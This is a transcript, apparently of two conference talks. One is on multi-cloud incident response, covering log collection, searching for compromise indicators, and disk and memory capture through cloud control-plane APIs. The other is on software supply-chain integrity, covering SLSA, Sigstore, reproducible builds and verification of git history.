*.yourdomain.no. And you can also try to enumerate subdomains, to see if any registered subdomains are being hosted in the cloud. And when you do that subdomain enumeration, you're probably going to get some IPs: what's the IP of the asset. You can then download the published IP ranges of the different cloud providers and see if you can match the IP where your assets are running to a public cloud provider, if they're not already fingerprinted by the service you're using to look for this.
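A small sketch of that IP-range matching for AWS, whose published list lives at a stable URL (Azure publishes a downloadable Service Tags JSON, and GCP has https://www.gstatic.com/ipranges/cloud.json). The IP below is just a placeholder standing in for one found via subdomain enumeration.

    import ipaddress
    import json
    import urllib.request

    AWS_RANGES_URL = "https://ip-ranges.amazonaws.com/ip-ranges.json"

    def find_aws_prefix(ip: str):
        ranges = json.load(urllib.request.urlopen(AWS_RANGES_URL))
        addr = ipaddress.ip_address(ip)
        for prefix in ranges["prefixes"]:  # IPv4 entries; IPv6 lives in "ipv6_prefixes"
            if addr in ipaddress.ip_network(prefix["ip_prefix"]):
                return prefix["region"], prefix["service"]
        return None

    print(find_aws_prefix("52.95.0.1"))  # placeholder IP from subdomain enumeration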
What else can you do? Well, normally you could read the documentation; in this case, you can't. I've also uncovered a bit of shadow IT, or clouds, by making friends. So lunch is a really good opportunity. Find some guys with some print on their t-shirt. Maybe they have a B-Sides t-shirt or something else, or maybe a Kubernetes t-shirt; then they're even more likely to run cloud. Or look for people with stickers on their laptop; maybe they have a cloud sticker there, too. Then you'll know they might know more about the cloud in the organization. So, in this scenario, we found some cloud, a significant amount of cloud. We found three AWS organizations, a Google Cloud organization, and two Entra ID tenants that both had Azure subscriptions in them.
And of course we found Alibaba Cloud, but that was out of scope in this case, so we're not going to cover it in this session. This significant cloud footprint sets some rules for how you can go about this: maybe you have developed a tool to do this efficiently in one cloud, but now we're talking multi-cloud, so you need to find approaches that will work and scale here. Let's give this cloud footprint, or cloud estate, that we've found some remarks based on our initial look. Multi-cloud: that's the obvious one. There's no hardening, meaning basically poor configuration of most resources. There's no logging besides the defaults, and we're going to look
into that. There's no governance; the GRC team didn't know much about the cloud environment. There are access keys and cleartext secrets floating around. Misconfigurations are prevalent. And of course, most things have been clicked together in the portal, or people have deployed stuff using the CLI. So, this is the basis. Where do we even start? We need some sort of process here, and you can follow a simple incident response process: you start with investigation, looking at the things that are there. If you find any signs of compromise, you do some sort of containment and eradication, and then you proceed to eliminating the risks once you've performed those steps.
So, the first thing we're going to do is, of course, the compromise assessment. When doing the compromise assessment, it's important to keep in mind how the public cloud works, because you have the cloud control plane and the cloud data plane. A compromise could occur in both of these domains, and it could also occur in one domain and move to the other, because of how these domains interact. In this scenario, we're going to start by looking at the control plane, and later we're going to move into the data plane and see how we can do investigation there as well. So, when doing a control plane compromise assessment, to call it that, we first start with the logs. We can
also utilize the control plane to identify possible persistence. It could be identities that have had a key added, secrets found in cleartext configuration that are now being used, virtual machines that have been spun up or compromised through the control plane, resource configurations that are weak and being used to gain persistence, or it could be at the network level as well. So, the first thing we're going to do is focus on just getting all the logs from the cloud control plane. So, we wrote the cloud log collector, which interacts with the different cloud providers using the REST APIs. For Google Cloud, we're using the Cloud SDK, which handles
the authentication and allows us to extract the different logs really simply. For Azure, we're just using the SDK for authentication, because that flow is a bit complex to write yourself, and it works really nicely with the SDK. But I don't like the Azure SDK, so to do things fast and at scale, I'm using the REST API instead for Azure, only using the SDK for authentication. For Entra ID, we're also using the REST API towards Microsoft Graph, with the same SDK for authentication here as well. And for AWS, we're only using the SDK, which is named boto3. I don't know why.
So, with that: like I said, there was no logging enabled, but what does that mean in the context of cloud? Well, luckily, you still have some logs in the cloud when there's no logging enabled. If you look at AWS, we have the log type CloudTrail, which is the API log for AWS, with a default retention period of 90 days. It's not so straightforward to just say "I want all those logs for the last 90 days", and I'm going to show you how that's handled in the cloud log collector soon. In GCP, you actually have a 400-day retention period for the admin activity logs, which is really beneficial if
you have a compromised GCP environment. And you also have 30 days of data access logs, which you don't have in any other cloud providers at all.
For Azure, you have the Azure activity log, with a default of 90 days. This one is also a bit tricky; you need to collect it from different places, which the cloud log collector handles. If you're on an Entra ID free tenant, you only have the audit and sign-in logs for the last seven days, and if you have a license, you have 30 days by default. If you're on a free Entra ID tenant, you will also get an error when trying to collect the logs from the API, because they don't want you pulling the logs out before the seven-day retention expires so you could get actual retention without paying for it; they'll just block you from interacting with the API. I'm pretty sure there's
a lot of people in this room who could bypass this by just scraping the data from the browser instead. So the cloud log collector: the whole intention behind it is really simple log extraction from multiple cloud environments in these weird circumstances where you need logs from different clouds, like this one. So, I'm just quickly going to show you how the cloud log collector works. It's open source; I think it's on O3Cyber's GitHub, or my personal one. It's called the cloud log collector. You can see there are just different, really small functions for each of the cloud providers, and we call those functions. We can use the same time frame for all of the
cloud providers, so we know we get logs within the same time frame, which is really nice. Of course, it depends on the retention of each cloud provider; if I put 400 days, I would only get Google Cloud logs that far back. We can now run it, and we see it gets the Google logs first, where it uses the filter for the time frame. It gets the token for Entra ID, and then it gets the logs for the different subscriptions; it loops through them all. Then it tries getting the Entra ID logs, which fails. And here comes the tricky part: imagine doing this manually for AWS, where you need to paginate, and you need to go through every single region for every single AWS account to get
those 90 days of logs that are default. So this is also one of the reasons for writing the cloud log collector: in AWS, CloudTrail is logged in each respective region, and it could be regions you're not using at all, where you still have events because you didn't disable the region. You can see there's also one region failing there, in Canada; that's simply because the region isn't enabled in my account. And now it's going to go through all of those regions for all of the accounts.
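The AWS part of that region fan-out looks roughly like this: a simplified sketch of what a collector like this does for a single account. The real tool lives in the repo and also handles multiple accounts, credentials, and output formats.

    from datetime import datetime, timedelta, timezone
    import boto3

    session = boto3.Session()

    # Enumerate regions; regions not enabled for the account will fail later.
    ec2 = session.client("ec2", region_name="us-east-1")
    regions = [r["RegionName"] for r in ec2.describe_regions(AllRegions=True)["Regions"]]

    end = datetime.now(timezone.utc)
    start = end - timedelta(days=90)  # CloudTrail's default event-history retention

    events = []
    for region in regions:
        cloudtrail = session.client("cloudtrail", region_name=region)
        try:
            for page in cloudtrail.get_paginator("lookup_events").paginate(
                StartTime=start, EndTime=end
            ):
                events.extend(page["Events"])
        except Exception as exc:  # e.g. a region that isn't enabled, like Canada above
            print(f"{region}: {exc}")

    print(f"collected {len(events)} events")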
And it's going to save that into a JSON file. So each of the different cloud providers will have a JSON file with its pure log format; there's no normalization or anything happening here. And I'm going to show you soon why I don't bother doing that.
See, and there we go. So now we have the different JSON files. So, fairly simply, we can use the cloud log collector and get a bunch of JSON files with all the logs down to our workstation. And now what? We have the logs, but what do we do with them? I have an architecture that I really like for efficient log analysis, which I've used on incident response: I just spin up an Azure Data Explorer cluster. It could be Google BigQuery or something else; I just like using Azure Data Explorer. And I upload the JSON files there; I'll show you exactly why and how. This is my Azure portal, and I've created a Data Explorer cluster for this purpose.
We're just going to access it through the web panel. We could also do all of the upload through the API, or put it in a storage account and auto-ingest it. We already have the Azure and GCP logs in here, but we're now going to import the AWS logs as well, the CloudTrail logs. So we'll create a new table and just choose the file that we got from the cloud log collector; there's 72 gigabytes, and it's going to process that really fast. You can see it does some normalization for us, so that's why I didn't bother doing it myself. And this is the really nice part: now I have AWS, Azure and GCP logs in the Data Explorer cluster where I can query them. I could do
this locally using jq as well, but with large data sets it won't really scale, while for the Data Explorer cluster I can choose whichever size I need. Let's get 10 random logs from the AWS table. Yay, it works. So, now we're going to look for something specific across all the logs: three IPs that we've gotten from someone else on the response, saying these three IPs are known indicators of compromise. We're now looking for those across GCP, AWS and Azure. And it goes super fast, no matter how much log data you have, because you can scale up the cluster. And we can see there's a match on one of the IPs in GCP, so we know the indicator is present
there. We can then look at the AWS logs and see that there's also a match on this one, because we've filtered for it, and there we see the same IP being matched here as well. And now let's go down to Azure.
And we can see there's a match here as well.
If I change the IP now and try to run it again, you'll see there are no results returned, so it actually works to look through this data and find the indicators you're looking for. I could also be looking for other things, such as actions, for instance. Those would be unique per cloud provider, but I could also normalize some actions or techniques that are known to be used across multiple clouds by threat actors as well.
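The same IOC hunt can be scripted against the cluster from Python. A sketch using the azure-kusto-data package, where the cluster URL, database name, table names, and the IOC IP are all placeholders for whatever you created when ingesting:

    from azure.kusto.data import KustoClient, KustoConnectionStringBuilder

    CLUSTER = "https://mycluster.westeurope.kusto.windows.net"  # placeholder cluster
    kcsb = KustoConnectionStringBuilder.with_az_cli_authentication(CLUSTER)
    client = KustoClient(kcsb)

    # KQL's search operator scans every column, so no normalization is needed.
    query = 'search in (AWS, Azure, GCP) "203.0.113.7"'  # placeholder IOC IP

    for row in client.execute("cloudlogs", query).primary_results[0]:
        print(row)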
So the nice part about this is that you can have one guy just collecting all the logs and uploading them to the Data Explorer cluster. And the upload doesn't have to be through the console: put it in some sort of storage blob and have it auto-ingest. Then you can have your team analyzing the data and fetching the different indicators, if you're working on a large-scale incident, and they can continuously analyze against the data set. And you can upload more data as you're able to acquire it. And we could potentially bring Alibaba Cloud into the mix here as well and just ingest that into a
separate table. So, for the sake of this scenario, let's conclude that there were no signs of an active compromise affecting the cloud control plane or the cloud-based identities. So, what are some precautionary measures we can still take? We could go through all the access keys, revoke them, and see what their usage is, because, again, we only have a limited number of days of logs, so things could have happened before the window where we have logs. Since we only have seven days of sign-in logs as well, we could revoke all the sessions and tokens to be sure, rotate all the secrets, and then look for signs of persistence, such as external trusts being established.
Now it's time to look at the data plane, and how we can leverage the control plane to investigate the data plane, because in the cloud you can't really just fetch a disk like this. I've already shown you how to get the logs with the cloud log collector. You can get disk images through libcloudforensics, which is open-sourced by Google. And for memory, I like to use a portable binary from Comae, which allows us to take a volatile memory dump, and I'll show you how to use this in the cloud context. So, libcloudforensics: I made a few adjustments, so it runs synchronously across multiple clouds. What it does is use the different cloud providers' APIs and then
copies or shares a disk, based on the best practice for capturing evidence in that given cloud provider, and then shares it with your forensic environment. You can do this at scale as well: you can get copies of all the disks in the different cloud providers and then have someone analyze them and look for persistence or malware on the disks. How about memory? Let's say we have a virtual machine with a managed identity. This could be running in Azure, but it could as well be running in GCP or AWS, and it would work more or less the same way. So, I quickly put together runcommand.py, which is able to execute code from the cloud control plane
on the different hosts in any given cloud provider. I'm just going to feed it my Invoke-MemoryCollection.ps1 script, which is going to run
on the virtual machine. The virtual machine is going to use its managed identity to authenticate to the cloud provider. It's going to download the binary over HTTPS; it could also be in cloud storage where I have it pre-staged, since it's already authenticated. And it's going to write the memory to disk. With the memory written to disk, it's going to again use its managed identity to upload the memory file to a storage account. I'm quickly going to show you how this works as well. You can see there are some arguments that are cloud provider specific: we can use it on Microsoft Azure, on AWS, or on GCP, and we can feed it the exact same
script here. Let's see. Yeah. We just have functions to run it on the different cloud providers, and then we can trigger it as a run command. Since we're going to run it on a Windows instance, we can feed it whatever PowerShell script we like. So, I have a script I use for taking memory dumps; I use it mostly for cloud environments. We download the Comae toolkit, which allows us to create a volatile memory dump. When copying large files in Microsoft Azure, I like to use AzCopy, which is a binary, because it handles way faster uploads than using the storage account REST API directly; I could also create something using the storage account SDK, but I just get the AzCopy binary.
And based on that, we just run the Azure incident-response memory collection function, and we can trigger that using the run commands. So let's just trigger this. We specify the cloud provider, Azure, the script path, which is the script we just went through, the VM name, what resource group we're going to put it in, and the subscription. Oops. Crap. Okay. There we go. Yeah. We run it quickly for Azure and AWS, and there we can see there's now a memory file uploaded here, using only the cloud control plane to get the memory. So by using the cloud control plane we can interact with the data plane to get the different things we need. We could query for specific logs or anything on the different hosts.
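For the Azure case, the core of a runcommand.py like the one shown can be surprisingly small. A sketch assuming the azure-identity and azure-mgmt-compute packages, with placeholder subscription, resource group, VM, and script names:

    from azure.identity import AzureCliCredential
    from azure.mgmt.compute import ComputeManagementClient

    compute = ComputeManagementClient(AzureCliCredential(), "<subscription-id>")

    with open("Invoke-MemoryCollection.ps1") as f:  # placeholder script name
        script_lines = f.read().splitlines()

    # Run Command executes via the VM guest agent, driven purely from the control plane.
    poller = compute.virtual_machines.begin_run_command(
        "ir-resource-group",          # placeholder resource group
        "victim-vm",                  # placeholder VM name
        {"command_id": "RunPowerShellScript", "script": script_lines},
    )
    result = poller.result()
    print(result.value[0].message)    # stdout/stderr reported back by the agent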
If it was a Linux host, we could just trigger something else, like a shell script, instead. So it gives you a wide array of opportunities, just being able to leverage the cloud to your benefit. So we're done with our investigation, and now we're getting into the remediation part. The first thing: again, you want to go back and look at how bad things are from a configuration perspective. There's open source stuff you can run, like Prowler, which benchmarks your whole cloud environment no matter which cloud you run in. I think it's really good. It's compliance-driven, giving you, like, okay, you're CIS compliant with this. But it also finds some
other neat stuff, like misconfigurations that can potentially be exploited. Now, you
should also make sure you've enabled all the logs for later. There are many ways to do it, and many tricky ways to get the logs out of the different cloud providers. You need to spend time and study how each cloud provider works, what logs are relevant, and how to filter them so you don't get immense volumes. And then I also like to take a more manual approach. So, okay, I might run Prowler to get a high-level overview, but I also like to just dump all the resource configurations. If it's Azure, I'll just dump all the Azure Resource Manager objects and look through everything, mostly with Ctrl-F, looking for things I
know are bad, or trying to find secrets, and trying to map out the architecture. And based on getting all the metadata and configuration of the cloud, you can start to uncover attack paths. It requires a lot of patience for large cloud environments, but it's definitely doable, and you start seeing patterns after a while.
I think my conclusion is that you should be adept at working with the SDKs and the REST APIs for efficient incident response in cloud environments. And although the cloud had no signs of compromise in this scenario, and the attack only affected the on-premises environment, it was only a matter of time, given the poor configuration that we uncovered. That's all I had for today. So thank you.
Thank you very much, Karim. Are you here for the rest of the day? I'll be here. Great, thank you so much. So now we have lunch until 1. If you submitted any dietary restrictions or special needs in your registration, that should be taken care of. If you're coming downstairs, the food will be on the bar on the left, and all the way at the back is the special-order stuff. So that's where it is if you're looking for it, and if there's something you need that you can't find, please let us know. Enjoy your lunch.
account for the number of people that we have, so there should be enough chairs for everyone. And the shirts have arrived! Yay! They are black, and they were apparently printed this morning, so there you go, problem solved. I want to kick off the afternoon with Stian Kristoffersen, a long-time supporter of B-Sides and a contributing member of the Norwegian infosec community. You may have already seen him downstairs in the hardware hacking village, sharing his time, expertise, passion, and some of his groovy gadgets as well. He's also been at the last two B-Sides events, I believe. This is the fourth. The fourth one? Yeah, sorry, I stand corrected. We should have had a prize or something for
that, probably. I'll buy you a drink later if you want. And the talks are all selected based on the feedback that we receive in the feedback form that you all will get, and on our own selection committee's impressions of the abstracts and the previous work, so it's not pay-to-play. Although we're happy to have Telenor as a gold sponsor, along with Defendable and Mnemonic as platinum sponsors, we don't ever choose talks based on who the sponsors are. And we don't sell the participants list: no amount of money, you're not getting it. Anyway, thank you for coming back for your fourth time, Stian. Take it away. Let's give it up for Stian.
So thank you for the introduction. Happy to be back at B-Sides. I work as a lead security engineer at Telenor, where I focus on software and supply chain security, which this talk is a part of. We're going to focus on the supply chain part today. Shout-out to the people at Telenor and Hackeriet who have contributed to this. Everything I'm going to show is open source, at the supply-chain-tools organization on GitHub, so you can check it out there. It's still early days, it is experimental, but that also makes it a good time to get involved, if you would like to do that. So first, let me try to motivate why we care about
securing the software supply chain. Here we have a typical supply chain. You have the producer, who writes some source code and uploads it to a forge like GitHub. Maybe there's a pull request review before it's merged in. Then you build the package, maybe on somebody's laptop, maybe in a GitHub Action or something like that. And then you upload it to a package registry like PyPI or npm, before it's consumed by the consumer. Each package usually depends on other packages as well, so that's also part of it. SLSA has this great overview of everything that can go wrong, which is basically everywhere. On their website, they have a good list of actual
real-life attacks on all of these eight places. We can divide this into three main categories: build threats, source threats, and dependency threats. I don't have time to give examples of all of these, so I'm just going to highlight two actual attacks. Back in 2011, kernel.org was hacked; that's the home of the Linux kernel source code. Not great, and they did some mitigations afterwards. I think most people don't think about this when they upload code to GitHub or somewhere like that, but in most scenarios, you rely on GitHub not getting compromised for your security. Next up, we have a build example: the SolarWinds hack back
in 2020. It was part of a bigger attack against the US government, where the attackers inserted a backdoor through the build process into a legitimate SolarWinds product that was used by the US government downstream.
So those are actual attacks, and that's just two of the many things that can go wrong. And of course, you might be using different solutions for each of these steps. So hopefully that's some motivation for why we care about trying to secure all of this, which is what the rest of the talk is going to be about. These are the parts we're going to look at: how to secure the build, the source threats, and the dependencies. We're going to use signatures to establish trust in both source code and dependencies. We need to establish trust in the keys of the producer, so we're going to look at that. And then we're going to conclude and bring everything together. So it's
worth noting that we are not covering That the source code that the producer creates is of poor quality or that it's malicious We're only looking at making sure that what the producer intended to create is what the consumer actually consumes in the end That hasn't been tampered with along the way So first up build integrity we're going to start at the end there because it's more mature there's more Specifications in this area and there's also more source code you can use to improve the security here. So first off we have the Salsa specification. So they not only do they have the great overview of the threats, they also have some levels you can use to get more maturity in the build process. So at the
build level one, you're basically saying: I have some attestation; for example, "I used this to produce this binary, which has this hash." At level two it's the same, only you sign that attestation, and the build should run on a hosted platform rather than on somebody's laptop. At level three, there are more requirements for hardening the build platform; typically that means running each build in a separate VM, and also
that the signing keys should not be directly available to the build process, so that even a fully compromised build process can't sign whatever artifacts it wants. We can do better than this by using transparency logs. A transparency log can keep track of when the signing key is used: when you do a release, you record it in this immutable log, so you can make sure there was only one version 1 release, and that no other, malicious version exists on the side. That's the main use case, and it means you might be able to detect something before it does damage; or, after a compromise, you can use the log for forensics, to see when the bad thing was introduced.
This is all based on Merkle trees; if you're interested, you can read up on the specifications. We're going to use the Sigstore transparency log. The two main projects it consists of are Rekor, which is the actual transparency log, and Fulcio, which gives you a way to sign things that go into the transparency log using OIDC tokens. That is exactly what npm did when they introduced this in 2023.
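As a rough illustration of the Merkle-tree idea these logs are built on (a minimal sketch, not Rekor's actual implementation, which uses domain-separated hashing per RFC 6962): each entry is hashed, and pairs of hashes are combined upward into a single root, so tampering with any recorded entry changes the root.

```csharp
using System;
using System.Collections.Generic;
using System.Linq;
using System.Security.Cryptography;
using System.Text;

// Toy Merkle root over a list of log entries. Illustrative only.
static byte[] MerkleRoot(List<byte[]> leaves)
{
    var level = leaves.Select(SHA256.HashData).ToList(); // hash each entry
    while (level.Count > 1)
    {
        var next = new List<byte[]>();
        for (int i = 0; i < level.Count; i += 2)
        {
            // Pair up hashes, duplicating the last one on odd-sized levels.
            var right = i + 1 < level.Count ? level[i + 1] : level[i];
            next.Add(SHA256.HashData(level[i].Concat(right).ToArray()));
        }
        level = next;
    }
    return level[0];
}

var entries = new List<byte[]>
{
    Encoding.UTF8.GetBytes("release v1 sha256:ab12..."), // placeholder entries
    Encoding.UTF8.GetBytes("release v2 sha256:cd34..."),
};
// Changing any recorded entry changes the root; that is what makes the
// log tamper-evident.
Console.WriteLine(Convert.ToHexString(MerkleRoot(entries)));
```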
So basically, your GitHub Action uses the OIDC token of the workflow to sign attestations, which are included in the Rekor transparency log. Then you upload both the attestation and the package to the npm registry, and once you've done that, if you scroll to the bottom of the package's npmjs.com page, you'll see the provenance, with the relevant information needed to verify that yes, it was indeed built and released correctly. This is exactly what Homebrew did as well, back in May this year. It's still opt-in to actually verify the integrity of each Homebrew package you install, but hopefully, before too long, it will be on by default to verify
this attestation. Both npm and Homebrew use in-toto as the attestation format: I said they both produce provenance, and the file format of that provenance is in-toto, which is just a structured, standardized way of storing that data. It can also be used to describe how each build step should work, and to verify that, but we're not going to use that here. We can do even better with reproducible builds. Google's definition: running the same build commands on the same inputs is guaranteed to produce bit-by-bit identical outputs. In other words, we can always get the same bytes given the same source code, basically. So that takes us to the
release process we have in the example repo, which we're going to look at shortly. You push a tag to GitHub; that triggers the SLSA workflow, which runs in a separate VM that we don't control. The SLSA builder is created by the SLSA people, not us, meaning that if you trust them, you can trust that the transformation from source to binary was done correctly. The result is signed with Fulcio, like for npm and Homebrew, and then included in Rekor in a similar way. Then the binary and the attestation data are uploaded as a release to GitHub. We can then download the release, reproduce the binary locally to verify that it's the same bits, and countersign it to show that yes, we also got the same bits as the SLSA builder. Overall this gives very high assurance that what the consumer gets in the end is what the producer intended. So that takes us to the first demo.
So here I'm in the release prototype repository. I'm just going to quickly look at the workflow: scrolling down to the bottom, you can see that I use the SLSA builder. This is a Go project, and the workflow takes the source code and produces the binary. So let's look at what was produced. Here we have release 004, and we have the binary itself and the in-toto attestation. If I pop over to the terminal, I can verify that the SLSA release worked in the correct way; they have a verifier. We're going to verify the artifact, which is this file, and we have the provenance here,
expecting it to originate from the release prototype repository, and we expect it to be version 004. If I run this, it passes; it's happy, meaning that the SLSA part of this checks out. Then, as I said, we can reproduce the binary locally, so I'm going to do that: I have a reproducible-build script which produces the binary. You can take the sha256 of that, and we can see that it's the same hash as the one we got in the attestation.
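That local check is conceptually tiny. A minimal sketch, with a placeholder file name and hash rather than the demo's real values:

```csharp
using System;
using System.IO;
using System.Security.Cryptography;

// Hash the binary we rebuilt ourselves and compare it to the hash recorded
// in the build attestation. Placeholder values, not the demo's real ones.
var expectedFromAttestation = "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855";
using var sha256 = SHA256.Create();
using var rebuiltBinary = File.OpenRead("./binary-linux-amd64");
var actual = Convert.ToHexString(sha256.ComputeHash(rebuiltBinary)).ToLowerInvariant();
Console.WriteLine(actual == expectedFromAttestation
    ? "OK: reproduced build matches the attestation"
    : "MISMATCH: not reproducible, or the artifact was tampered with");
```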
Now, I only verified the attestation file; I didn't actually show it to you, so let's do that. DSSE stands for Dead Simple Signing Envelope, and it's the wrapper around the attestation; we made a small CLI just to make the in-toto payload easy to extract. There's going to be a bunch of extra data from the build in here, but if we scroll to the top, the most important part is the file name and the hash, which is the same hash we got when we reproduced the build locally. The next thing is that there are two signatures in the in-toto attestation, not just one. If I just dump the file here, you can see that there's actually a list of signatures: the first one is from the SLSA builder, and the second one is the one I countersigned after verifying the build. So we can extract the signature using jq into a file, and then verify that signature using SSH. It's a good signature. In the future this should be smoother, but it's what I had time for before this demo. The end result is that we get very high assurance: the build is verified reproducible, it's SLSA level three, it's built in an isolated VM, and it's recorded in the transparency log, so we can make sure this is the only version 004 build and there's no other malicious version.
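For reference, a DSSE envelope is just a JSON object with a payload type, a base64-encoded payload, and a list of signatures (that structure is from the DSSE spec). A rough sketch of pulling those fields out; the file name is a placeholder, and the demo used the project's own CLI rather than code like this:

```csharp
using System;
using System.IO;
using System.Text;
using System.Text.Json;

// Read a DSSE envelope: payloadType, base64 payload, signature list.
using var doc = JsonDocument.Parse(File.ReadAllText("binary.intoto.jsonl"));
var root = doc.RootElement;

Console.WriteLine($"payloadType: {root.GetProperty("payloadType").GetString()}");

// The payload is the in-toto statement itself (subject name, digest, etc.).
var payload = Convert.FromBase64String(root.GetProperty("payload").GetString()!);
Console.WriteLine(Encoding.UTF8.GetString(payload));

// In the demo there are two entries: the SLSA builder's signature and the
// maintainer's countersignature.
foreach (var sig in root.GetProperty("signatures").EnumerateArray())
    Console.WriteLine($"signature, keyid: {sig.GetProperty("keyid").GetString()}");
```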
So that was the build part. Let's move on to source integrity. To warm up:
if you don't sign your commits, it's possible to spoof the identity. The committer email and the author email are just metadata that you can tamper with, so you can pretend to be some other person, one who might be more trusted in the project you're trying to attack. If you sign your commits, there will be this "Verified" box. If a commit is signed with a key that GitHub doesn't recognize, it's marked as "Unverified" rather than wrong or malicious; and if you don't sign your commits at all, the box is just blank. So what you should do is sign your commits and turn on vigilant mode, which always shows the verification box, whether it checks out or not. And then you should enforce signed commits in the branch rulesets. Moving on to somewhat more advanced attacks, we first need a high-level understanding of how the Git metadata works. You have your branches, say main, or a tag, and those point to a commit. Each commit then points to its parent, which can be one or more commits. Both the commits themselves and annotated tags can be signed, but the pointers themselves are not signed. That's where the attack comes in.
There is a mitigation for this, called signed pushes, which kernel.org introduced after the hack, but it's not supported by GitHub, so we can't use it there. So let's look at some attacks. This is from a 2016 paper by Santiago Torres-Arias et al., and these are the three main attack types. You have rollback, where you point, say, the main branch at an older commit rather than the most recent one, and then just hide that the more recent commit ever existed: you're rolling the history back. Next, we have teleportation, where instead of pointing at the right commit, you point at some other commit in the repository. If you're signing the commits, it at least has to point at a commit signed by the correct key, but an attack might still be possible. For both rollback and teleportation, what you want as an attacker is a known vulnerability or some other functionality you gain by doing this; you're steering consumers to the source code you're looking for. Then there's deletion, where you basically just delete a branch and all its commits, which is more of a denial of service.
Some of this is made harder just by how Git works in general, but to get even better integrity protection, we've created new tooling (git verify and git release) where we verify more of this. One of the main insights for verifying the integrity is to use merge commits. Using merge commits in Git is optional, but if you enforce them, you get some extra properties: in a merge commit, the left parent is the previous commit on the same protected branch, and the right parent is the feature branch you're merging in. We can use this geometry to enforce some invariants, and we can anchor it by saying: we expect this particular commit to exist on this protected branch. That reduces the rollback window to the commits after the anchor; we can't know whether there's a newer commit, but each time we see a new one, we can add it as an anchor and make the window smaller. This type of merge commit also won't occur naturally in normal Git use, and it prevents the teleportation attacks. I don't have time to go deeper here, but there are more details in the repository, and you can look at the threat model there.
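A minimal sketch of that invariant on a toy data model (illustrative, not the tool's actual code): walk the first-parent chain from the branch tip back to a trusted anchor, requiring every step to be a merge commit.

```csharp
using System.Collections.Generic;

// Toy model: on the protected branch, every commit must be a merge whose
// FIRST (left) parent is the previous commit on that same branch.
public record Commit(string Id, IReadOnlyList<string> ParentIds);

public static class BranchVerifier
{
    // If every step from tip to anchor is a merge commit, the tip provably
    // extends the anchor, shrinking the rollback window and ruling out
    // teleported histories.
    public static bool VerifyProtectedBranch(
        string tipId, string anchorId, IReadOnlyDictionary<string, Commit> commits)
    {
        var current = tipId;
        while (current != anchorId)
        {
            if (!commits.TryGetValue(current, out var commit)) return false; // unknown commit
            if (commit.ParentIds.Count < 2) return false; // not a merge commit: invariant broken
            current = commit.ParentIds[0]; // the previous commit on the protected branch
        }
        return true;
    }
}
```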
So we have the same release process as earlier, but before we push the tag, we run this git verify tool, and we also use the release tool, which I'm now going to demo. Jumping over to the repository, I can run git verify, and it validates OK. Great; so it has run a bunch of checks. The identities and rules are listed here: we have a set of identities, and what roles the different identities have. Here we have three maintainers. We have a bunch of rules that get applied; for instance, require-merge-commit is true. We can also require that tags have to be signed. We're using SSH signatures, so that's turned on. And we're also using hardware keys to sign the commits, so we can also require that the user actually touched the hardware key when making the commit; there's also support for requiring a PIN entry or similar on the security key. You can optionally allow the forge itself to make commits, either merging pull requests or making actual content changes. Then we have a list of protected branches,
which is main here, and the list of repositories: the URI for the repository, with both a SHA-1 and a SHA-256 hash in case of SHA-1 collisions. And this is how we anchor it, as I mentioned. So that's verifying the source integrity. Then, when you do a release, you release using git release, which creates both the Git tag and an accompanying attestation, like the one I showed before for the binary. So let's look at how the tag looks.
Here we include some extra metadata, in the tag-metadata field of the tag. If you look at that, you can see the extra information included. We have the repository URI in here; that is to prevent a teleportation attack to a different repository. Forks are very common on GitHub, and if someone does a release on a fork, you don't want that release to be mistaken for a release from the upstream repository; that's why we include it. We have the SHA-1 and SHA-256 of the commit itself. We also have the previous tag, and what that gives you is an ordering of all the releases: when releases are sent to the build server, typically from a forge, the forge can't omit a release or reorder the releases without the build server being able to detect it. We also have some extra protected-branch metadata, which is useful for detecting more of these teleportation and rollback attacks. So that concludes this demo. Basically, we can have higher assurance in the source code and in the release itself before we continue with the same build steps as before. Tying those two halves together more tightly is work for the future.
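Summarizing the fields just described as a sketch; the names here are paraphrased from the talk, not the tool's actual schema:

```csharp
using System.Collections.Generic;

// Illustrative only: paraphrased tag metadata, not the real schema.
public record TagMetadata(
    string RepositoryUri,      // ties the tag to one repo, so a release on a
                               // fork can't pass as an upstream release
    string CommitSha1,         // the tagged commit (Git's native SHA-1 id)
    string CommitSha256,       // second hash, in case of SHA-1 collisions
    string? PreviousTag,       // orders releases: a forge can't omit or
                               // reorder them without detection
    IReadOnlyList<string> ProtectedBranchHeads); // helps spot rollback/teleportation
```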
Next, we have dependency integrity. We're using Go, so we already get a lot of functionality from the language itself: it has a transparency log for releases, with all the same benefits I've talked about already. But maybe you don't trust the hashes you get from the Go infrastructure, and you want to verify that they are consistent with the hashes of the upstream source code. Going back to the release prototype repository, I can look at the dependencies for this project: it depends on the Go sandbox project in the same org, at a given version. So I can go upstream to that repository and check that git verify says the source code integrity is correct. Then I can run the go hash tool to recreate the checksums and see that yes, they are the same ones I'm getting from Go itself. The checksums are stored in go.sum, and it's the same there as in the ones we recreated. So again, you get very high assurance that a dependency is exactly what you expected to download.
Now, apart from the Sigstore flow, where we don't have to store the maintainers' keys because the OIDC token is used to obtain the signing material, for the other parts, where the maintainer signs the commits and countersigns the binary release and so on, we need to establish trust in the developer keys. This is a hard problem that many have tried to solve before. Here we're going to look at a variant based on The Update Framework (TUF). TUF is a specification for establishing trust in a set of keys, which are then used to update the next set of trusted keys; it's what Sigstore uses to establish its root of trust. I think TUF is pretty good, but for smaller projects it can be a bit much to set up, so I'm suggesting a more lightweight version, with some extra metadata to protect against things like key compromise. It only lives on a branch right now, the TUF-ish branch in the root-of-trust repository. The main idea is this: either you already trust the developer, maybe because you met physically at a conference; or you already trust one project and can use it to establish trust in another; or you're simply downloading source code or binaries for the first time, and then you use trust-on-first-use to establish trust in a set of keys. From there, those keys can update themselves over time. That's the point of root.json, which is part of the TUF spec. It delegates trust to targets.json, also part of TUF, which can delegate trust further, to, say, the git verify JSON config I showed you. So that's the idea. This is at draft stage, but I think it could be useful. One use case could be distros: when they package something, they could establish trust in a project like this and then, over time, be sure they're getting the right source code to package in their distros. OK, so, to sum it up: there are a lot of moving parts when hardening the supply chain.
For the verifier, hopefully we can reduce it to three steps: establish trust in some keys, download the package, and verify the attestation; then you're good to go. If you want further assurance, you can verify the integrity of the source code, reproduce the build, and verify all of the dependencies recursively. And ideally, there would be more people verifying the builds and the transparency logs and all of that. I think the main challenge going forward is to get something that scales, something easy enough for a lot of people to implement, so that it's not just the big flagship projects that use this, but also the smaller open source projects that are still important for a lot of people. By the way, we are looking for people to help secure our cloud-native platform, so feel free to visit our stand or come talk with me. We also have a CTF that's live now, at this address. I think it's open until six, but you have to be physically here to be eligible for the prizes. And with that, thank you for your attention.
